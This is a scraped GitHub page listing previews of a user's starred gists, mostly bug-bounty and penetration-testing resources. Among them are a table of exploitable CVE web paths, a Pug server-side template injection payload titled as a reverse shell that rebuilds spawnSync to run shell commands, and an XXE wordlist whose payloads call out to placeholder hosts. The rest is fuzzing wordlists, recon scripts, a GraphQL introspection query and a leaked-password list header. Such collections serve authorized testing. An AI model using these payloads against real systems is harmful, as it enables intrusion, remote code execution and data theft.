Skip to content

Instantly share code, notes, and snippets.

View ceylanb's full-sized avatar
🎯
Focusing

Ceylan Bozoğullarından ceylanb

🎯
Focusing
27 followers · 69 following
View GitHub Profile
@kafkaesqu3
kafkaesqu3 / exploitable_webpaths.md
Last active May 7, 2024 09:38
easy wins - exploitable/leaky web paths
Exploit/description Path
Microsoft Office Online Server SSRF (relay) /op/view.aspx
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519 /jobmanager/logs/
CVE-2017-7615 /verify.php?id=1&confirm_hash=
CVE-2018-1000130 /jolokia
CVE-2018-1000130 /actuator/jolokia
leak /actuator/env
@Jasemalsadi
Jasemalsadi / ssti_rev_shell_pug_node_js
Created February 16, 2021 08:33
SSTI reverse shell for pug template engine Node js
h1= title
p Welcome to #{3*3}
#{spawn_sync = this.process.binding('spawn_sync')}
#{ normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}}
#{spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}conso
@honoki
honoki / xxe-payloads.txt
Last active March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@DannyDainton
DannyDainton / naughtyStrings.json
Last active February 20, 2024 20:21
The Big List of Naughty Strings (https://github.com/minimaxir/big-list-of-naughty-strings) in a JSON data file that can be used with Postman's Collection Runner. You would only need to add the `{{naughtyValue}}` variable to the request and the Collection Runner will do the rest.
[
{
"naughtyValue": ""
},
{
"naughtyValue": "undefined"
},
{
"naughtyValue": "undef"
},
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active June 4, 2024 11:52
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@ziot
ziot / hostsbyasnname.py
Created July 15, 2019 23:07
Get hosts by ASN->CIDR->Hosts via company name
import requests, json
from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
requests.packages.urllib3.disable_warnings(SNIMissingWarning)
# another source of cidrs by asn
def getIPCidrs(asn):
@eur0pa
eur0pa / waywords.go
Last active April 11, 2024 08:32 — forked from lc/waywords.go
generate wordlists utilizing the wayback machine
package main
import (
"bufio"
"fmt"
"net/url"
"os"
"strings"
)
@localh0t
localh0t / introspection_urlencoded.txt
Last active November 20, 2023 23:49
Introspection query from GraphQL-JS (URL-encoded)
%0A%20%20query%20IntrospectionQuery%20%7B%0A%20%20%20%20__schema%20%7B%0A%20%20%20%20%20%20queryType%20%7B%20name%20%7D%0A%20%20%20%20%20%20mutationType%20%7B%20name%20%7D%0A%20%20%20%20%20%20subscriptionType%20%7B%20name%20%7D%0A%20%20%20%20%20%20types%20%7B%0A%20%20%20%20%20%20%20%20...FullType%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20directives%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20description%0A%20%20%20%20%20%20%20%20locations%0A%20%20%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%0A%20%20fragment%20FullType%20on%20__Type%20%7B%0A%20%20%20%20kind%0A%20%20%20%20name%0A%20%20%20%20description%0A%20%20%20%20fields(includeDeprecated%3A%20true)%20%7B%0A%20%20%20%20%20%20name%0A%20%20%20%20%20%20description%0A%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20type%20%7B%0A%20%20%20%20%20%20%20%20...TypeRef%0A
@mutin-sa
mutin-sa / Top_Public_Recursive_Name_Servers.md
Last active April 27, 2024 14:59
List of Top Public Recursive Name Servers

DNS:

IPv4 Addr IPv6 Addr ASn Political Region Loc Svc Org
8.8.8.8 2001:4860:4860::8888 AS15169 US Worldwide (Anycast) Google Public DNS Google
8.8.4.4 2001:4860:4860::8844 AS15169 US Worldwide (Anycast) Google Public DNS Google
1.1.1.1 2606:4700:4700::1111 AS13335 US Worldwide (Anycast) Cloudflare-DNS Cloudflare/APNIC
1.0.0.1 2606:4700:4700::1001 AS13335 US Worldwide (Anycast) Cloudflare-DNS Cloudflare/APNIC
208.67.222.222 2620:119:35::35 AS36692 US *W
@roycewilliams
roycewilliams / pwnedpasswords-v2-top20k.txt
Last active May 29, 2024 07:42
pwnedpasswords-v2-top20k.txt
#------------------------------------------------------------------------------
# Top 20K hashes from the Troy Hunt / haveibeenpwned Pwned Passwords list v2 (2018-02-21)
# with frequency count and cracked plaintext passwords
#
# The latest version of this file can be found here:
# https://gist.github.com/roycewilliams/281ce539915a947a23db17137d91aeb7
#
# NOTE: THIS FILE IS DEPRECATED.
# The equivalent of this file, but based on v6 of the Pwned Passwords, is here:
# https://gist.github.com/roycewilliams/226886fd01572964e1431ac8afc999ce